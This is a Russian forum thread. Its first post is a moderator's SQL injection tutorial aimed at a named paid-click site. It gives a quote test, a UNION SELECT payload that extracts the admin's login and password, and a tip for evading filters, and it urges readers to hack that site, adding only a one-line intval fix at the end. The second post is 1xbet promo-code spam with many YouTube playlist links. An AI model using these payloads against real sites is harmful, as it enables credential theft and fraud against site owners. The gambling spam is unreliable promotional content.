| theFaus | Дата: Четверг, 23.08.2012, 18:29 | Сообщение # 1 |
 Крутость 300+
Группа: Модераторы
Сообщений: 454
Награды: 8
Репутация: 2
Статус:  | У многих в скриптах не фильтруется передаваемый параметр id.
Пример: http://5b-u-x.com/news.php?id=pezdec
Как узнать, есть ли возможность запилить у вас инъекцию?
Идём по адресу новости любой существующей (id - это номер в ссылке на полную новость).
Пример: http://5b-u-x.com/45-new.html -> превращается у нас в http://5b-u-x.com/news.php?id=45
Теперь проверим возможность на проведение инъекции:
http://5b-u-x.com/news.php?id=45' (в конце просто добавили кавычку, если с одной не канает - тыкаем двойную)
Итак, наш результат: нету сообщения, мол новости не существует и при этом мы видим пустую страницу. В нормальных случаях мы бы увидели ошибку в синтаксисе запроса, в нашем же - вывод ошибок отключён, но тем не менее текстового вердикта, мол id новости неправилен - мы не видим.
Давайте этим воспользуемся. Идём в гугл, набираем запрос вида: "antichat.ru полный FAQ SQL инъекции" и читаем. Если хоть немного шарим в SQL запросах, то поехали...
Итак, разберёмся в коде файла, у нас есть запрос, который достаёт инфу о новости:
Code SELECT * FROM tb_news WHERE id='$newid'
* - значит берёт всю инфу из всех строк.
Теперь глянем в структуру таблицы tb_news, полей там 4:
- date;
- id;
- newstext;
- tema.
Немного модернизируем нашу ссылку: http://5b-u-x.com/news.php?id=0' UNION SELECT 1,2,3,4 -- (после -- пробел обязателен, можно также вставить # или /*)
id=0 выбрал id специально несуществующей новости, в противном случае ничего не получится. Цифры 1,2,3,4 специально проставлены для нумерации порядка, чтоб вбить запрос в "битые поля". Наш результат - мы видим цифры 2 и 3.
Давайте продолжать модернизировать линк:
http://5b-u-x.com/news.php?id=0' UNION SELECT 1,(SELECT username FROM tb_users WHERE user_status='admin'),(SELECT password FROM tb_users WHERE user_status='admin'),4 -- (опять же пробел)
И что мы видим? Логин и пароль админа, а дальше можно начинать действовать, уж дальше ума много не надо.
1. В статью я не стал расписывать почему и зачем нужны кавычки. Нет смысла - тут многие тугодумы начнут тупо флудить.
2. Букс для примера ещё не был взломан, дерзайте. Там тяжко продумать как его накрутить, ибо админка спрятана.
3. Там автовыплаты, макс.сумма - 15 рублей/раз в сутки. Так что лучше ищите админку.
4. Если на буксе жертве при попытке составить запрос ничего не получается - попробуйте пробелы заменить на + или на /**/
Фикс:
В файле news.php меняем:
На:
Code $newid=intval($_GET[id]);
Все.
Если кому чем помог отписывайтесь в теме или ставте +
|
| |
| |
| JessicaBib | Дата: Пятница, 05.04.2024, 20:32 | Сообщение # 3 |
 Крутость 0+
Группа: Пользователи
Сообщений: 61
Награды: 0
Репутация: 0
Статус: | Привет
согласен со всем
Так вот
Промокоды и акции 1xbet: как использовать в мобильном приложении
1XBET ПРОМОКОД - 500xbet
1XBET ПРОМОКОД - promo4spin
1XBET ПРОМОКОД - promo4xbet
https://www.youtube.com/playlist?list=PLmqwSzu5xQv2hYZ5USx2uyi-4qsHeIG31
https://www.youtube.com/playlist?list=PLmqwSzu5xQv1DpOZ5xp-bzkjbu2HUSIQO
https://www.youtube.com/playlist?list=PLmqwSzu5xQv1hlv4IkdzPmd4L4lNgfg0d
https://www.youtube.com/playlist?list=PLmqwSzu5xQv2UIZ9DxdX8hvIRSeFcq9Nr
https://www.youtube.com/playlist?list=PLmqwSzu5xQv0iuNh_njNGjA7fh5fTd7ZB
https://www.youtube.com/playlist?list=PLmqwSzu5xQv06MkZ9GaJ_Gu-4ZTNEDAu0
https://www.youtube.com/playlist?list=PLmqwSzu5xQv0AamsExblZJE9gprJDlQuF
https://www.youtube.com/playlist?list=PLmqwSzu5xQv0PZPo22qLGT5RXJRzgxmBR
https://www.youtube.com/playlist?list=PLmqwSzu5xQv1K3TZ69zefcbhRca97DN85
https://www.youtube.com/playlist?list=PLmqwSzu5xQv1QmpZrX1xHsOW2eScD2q3F
https://www.youtube.com/playlist?list=PLmqwSzu5xQv2EYYQabjfjOXbhgkIbK1eG
https://www.youtube.com/playlist?list=PLmqwSzu5xQv3gF7evAlwbBmRmmkqxXLMf
https://www.youtube.com/playlist?list=PLmqwSzu5xQv0Cny8loTm2a-CYnzBOWsuF
https://www.youtube.com/playlist?list=PLmqwSzu5xQv2zq36xISdEeI71G7fA-dRR
https://www.youtube.com/playlist?list=PLmqwSzu5xQv0x-GI9SFQkOD6TMk-QPOU0
https://www.youtube.com/playlist?list=PLuZhsK9QGHQXDff2zF_BBgDPpeJxs-10c
https://www.youtube.com/playlist?list=PLuZhsK9QGHQUo51kticmjB4If3_-PJKqT
Скачать 1XBET на АНДРОИД. Мобильная версия 1XBET. Ссылка на 1XBET. Приложение 1XBET на АНДРОИД.
Как скачать 1XBET на АЙФОН 2023 2024 Скачать 1XBET на АЙФОН
Скачать 1XBET на андроид. Приложение 1XBET на андроид. Мобильная версия 1XBET
Скачать приложение 1Х на андроид. Регистрация в 1Х
Как скачать 1xBET на Айфон. Приложение 1хбет на iOS
ЗЕРКАЛО 1xbet альтернативный вход на сегодня - как скачать 1хбет на пк
ЗЕРКАЛО 1xbet сайт скачать на айфон приложения - 1 икс бет промокод
Ставка цепочкой в Букмекерской конторе Регистрация на сайте инструкци 1xbet промокод
бк 1xbet зеркало рабочее на сегодня - 1 икс бет промокод бонус при регистрацииДобавлено (05.04.2024, 23:25)
---------------------------------------------
Привет
со свем согласен
И вот это тоже по теме
Промокоды 1xbet: повышаем шансы на победу в мобильном приложении
1XBET ПРОМОКОД - 500xbet
1XBET ПРОМОКОД - promo4spin
1XBET ПРОМОКОД - promo4xbet
https://www.youtube.com/playlist?list=PLoafUzDxCb0aLlfebRTX87r9b_0LxMtZD
https://www.youtube.com/playlist?list=PLoafUzDxCb0ZqG8NZ2Ul9W7zyFP1ojwPu
https://www.youtube.com/playlist?list=PLoafUzDxCb0Z_7GgsR5YGDcQ38Sm9Cnqd
https://www.youtube.com/playlist?list=PLoafUzDxCb0YZ2xoOzyedw2Im79w5r2G0
https://www.youtube.com/playlist?list=PLoafUzDxCb0Zm4LdI6TPgPUist2M03ApI
https://www.youtube.com/playlist?list=PL84ZWUdOvgIgQkSQXWrXKA4eCPIjmyHDc
https://www.youtube.com/playlist?list=PL84ZWUdOvgIg3CWWJH2wpvvt8eoCnfKru
https://www.youtube.com/playlist?list=PL84ZWUdOvgIi92ZAnZqTyXu4f52oW7tPs
https://www.youtube.com/playlist?list=PL84ZWUdOvgIgzUVLITi2M5qFDuzwnNh_T
https://www.youtube.com/playlist?list=PL84ZWUdOvgIh-L32GyfoNIpF42ALh_siW
https://www.youtube.com/playlist?list=PL84ZWUdOvgIgJ96XY4rJDEZ-iMC2nSJV1
https://www.youtube.com/playlist?list=PL84ZWUdOvgIhAUlHkKZYr_ujDJQosv6Oi
https://www.youtube.com/playlist?list=PL84ZWUdOvgIhBO5-fa_1qF1pVCxm9SAtG
https://www.youtube.com/playlist?list=PL84ZWUdOvgIjC62IOS76nf2IpF5coXcA-
https://www.youtube.com/playlist?list=PL84ZWUdOvgIhQ0N7DwB4J3qBgvyQy-WzC
https://www.youtube.com/playlist?list=PL84ZWUdOvgIj_v809rvYhrMS93mKMdEj_
https://www.youtube.com/playlist?list=PL84ZWUdOvgIheJshe46A6EU2_VDR3ygwR
Простая Регистрация в 1xbet . Как создать аккаунт в 1x bet? Инструкция как пройти регистрацию в 1хбет 2024
1xBet-распаковка, регистрация в приложении и некоторые моменты зарегистрироваться в 1хбет Казахстан
Регистрация в букмекерской конторе 1XBet 2024 + бесплатный прогноз - быстрая регистрация 1ХБЕТ промокод
1XBET регистрация с новым бонусом 500$ Пошаговая регистрация в 1x bet. Как зарегистрироваться в 1хбет с бонусом?
Быстрая регистрация 1xbet без паспорта КАК ЗАРЕГИСТРИРОВАТЬСЯ В 1X BET & РЕГИСТРАЦИЯ В 1ХБЕТ!
1xBet регистрация сегодня. Как зарегистрироваться в букмекерской конторе 1хБет по промокоду на бонус iphone
1xbet зеркало мобильная версия сайта скачать бесплатно 1хбет зеркало мобильная версия официальный сайт регистрация на сегодня
1xbet зеркало мобильная версия сайта скачать бесплатно на айфон 1хбет зеркало приложение скачать на андроид 1 икс бет букмекерская контора на виндовс
[url=https://www.youtube.com/watch?v=0jzJJwvf-Fs]ПРОМОКОД promo4win Как выигрывать в Лаки Джет пополнить счет в Кыргызстане заработать на Lucky Jet[/url]
|
| |
| |
